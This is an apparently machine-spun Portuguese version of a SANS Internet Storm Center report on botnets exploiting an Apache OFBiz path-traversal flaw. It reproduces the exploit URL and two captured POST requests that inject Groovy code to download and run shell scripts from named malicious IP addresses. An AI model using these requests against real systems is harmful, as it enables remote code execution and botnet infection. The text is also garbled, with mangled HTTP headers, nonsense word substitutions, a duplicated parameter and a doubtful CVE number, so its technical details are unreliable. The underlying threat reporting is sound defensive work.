O software program Enterprise Useful resource Planning (ERP) está no centro de muitos recursos humanos de suporte empresarial, contabilidade, remessa e manufatura. Esses sistemas podem se tornar muito complexos e difíceis de manter. Eles geralmente são altamente personalizados, o que pode dificultar a aplicação de patches. No entanto, vulnerabilidades críticas continuam afetando esses sistemas e colocam dados comerciais críticos em risco.
O SANS Web Storm Middle publicou um relatório mostrando como a estrutura de ERP de código aberto OFBiz é atualmente alvo de novas variedades do botnet Mirai.
Como parte de seu extenso portfólio de projetos, a Apache Basis oferece suporte ao OFBiz, uma estrutura baseada em Java para criar aplicativos ERP (Enterprise Useful resource Planning). O OFBiz parece ser muito menos prevalente do que alternativas comerciais. No entanto, assim como qualquer outro sistema ERP, as organizações dependem dele para dados comerciais confidenciais, e a segurança desses sistemas ERP é crítica.
Em maio deste ano, uma atualização de segurança crítica foi lançada para o OFBiz. A atualização corrigiu uma vulnerabilidade de travessia de diretório que poderia levar à execução remota de comando. As versões do OFBiz anteriores a 18.12.13 foram afetadas. Algumas semanas depois, os detalhes sobre a vulnerabilidade foram tornados públicos.
Vulnerabilidades de travessia de diretório, ou travessia de caminho, podem ser usadas para ignorar regras de controle de acesso. Por exemplo, se um usuário pode acessar um diretório “/public”, mas não um diretório “/admin”, um invasor pode usar uma URL como “/public/../admin” para enganar a lógica de controle de acesso. Recentemente, a CISA e o FBI lançaram um alerta como parte da iniciativa “Safe by Design”, com foco na travessia de diretório. A CISA destacou que eles estão atualmente rastreando 55 vulnerabilidades de travessia de diretório como parte do catálogo “Identified Exploited Vulnerabilities” (KEV).
Para OFBiz, a travessia de diretório é facilmente acionada pela inserção de um ponto e vírgula. Tudo o que um invasor precisa encontrar é uma URL que ele possa acessar e anexar um ponto e vírgula seguido por uma URL restrita. A URL de exploração que vemos atualmente é:
/webtools/management/forgotPassword;/ProgramExport
Como os usuários devem ser capazes de redefinir senhas sem primeiro fazer login, “forgotPassword” não requer nenhuma autenticação. “ProgramExport”, por outro lado, deve ter acesso controlado e não pode ser alcançado a menos que o usuário esteja logado. “ProgramExport” é particularmente perigoso, pois permite a execução de código arbitrário. A lógica defeituosa no OFBiz parou de avaliar a URL no ponto e vírgula. Isso permitiu que qualquer usuário, sem fazer login, acessasse a segunda parte da URL, “/ProgramExport”.
Um invasor deve usar uma solicitação POST para explorar a vulnerabilidade, mas não precisa necessariamente de um corpo de solicitação. Em vez disso, um parâmetro URL funcionará perfeitamente.
O SANS Web Storm Middle usa uma rede extensa de honeypots para detectar tentativas de explorar uma ampla gama de vulnerabilidades de aplicativos da net. Novas tentativas significativas de exploração são resumidas em um relatório “First Seen”. Neste fim de semana, esses sensores detectaram um aumento significativo nas tentativas de explorar CVE-2024-32213, a vulnerabilidade de travessia de diretório mencionada acima pelo OFBiz, que foi imediatamente detectada pelo relatório “First Seen”.
As tentativas de exploração se originaram de dois endereços IP diferentes que também foram associados a várias tentativas de exploração de dispositivos IoT, comumente associados às variedades atuais do botnet “Mirai”.
Os malfeitores usaram dois sabores do exploit. O primeiro usou a URL para incluir o comando que o exploit pretendia executar:
POST /webtools/management/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/the place/bin.sh
O segundo usou o corpo da solicitação do comando, o que é mais comum para solicitações “POST”:
POST /webtools/management/forgotPassword;/ProgramExport HTTP/1.1
Person-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: (sufferer IP tackle)
Settle for: */*
Improve-Insecure-Requests: 1
Connection: keep-alive
Content material-Kind: utility/x-www-form-urlencoded
Content material-Size: 147
groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().textual content);
Infelizmente, nem o script “bin.sh” nem o “sh” foram recuperados. Os endereços IP foram envolvidos em varreduras em 29 de julho, usando o agente de usuário “KrebsOnSecurity”, uma homenagem ao blogueiro de infosec Brian Krebs. No entanto, as URLs escaneadas eram, em sua maioria, parasitas, procurando por shells da net existentes deixados para trás por ataques anteriores. O endereço IP também foi usado para distribuir um arquivo chamado “botx.arm”. Este nome de arquivo é frequentemente associado a variantes do Mirai.
Com o anúncio da vulnerabilidade em maio, estávamos esperando por algumas varreduras para tirar vantagem da vulnerabilidade do OFBiz. A exploração foi trivial e, embora a população vulnerável e exposta seja pequena, isso não impediu os invasores no passado. Mas agora eles estão pelo menos experimentando e talvez adicionando a vulnerabilidade a bots como variantes do Mirai.
Há apenas alguns IPs envolvidos:
- 95.214.27.196: Enviando exploit como parâmetro de URL e hospedando malware.
- 83.222.191.62: Enviando exploit como corpo de solicitação. Malware hospedado em 185.196.10.231. No início de julho, este IP escaneou vulnerabilidades de IoT.
- 185.196.10.231: hospedagem de malware
Se você achou este artigo interessante e gostaria de se aprofundar mais no mundo de proteger aplicativos da Internet, APIs e microsserviços, você pode se juntar a mim no Community Safety 2024 (4 a 9 de setembro) para meu curso, SEC522. Veja tudo o que está reservado no evento aqui.
Observação: Este artigo foi escrito e contribuído pelo Dr. Johannes Ullrich, Reitor de Pesquisa do SANS Expertise Institute.
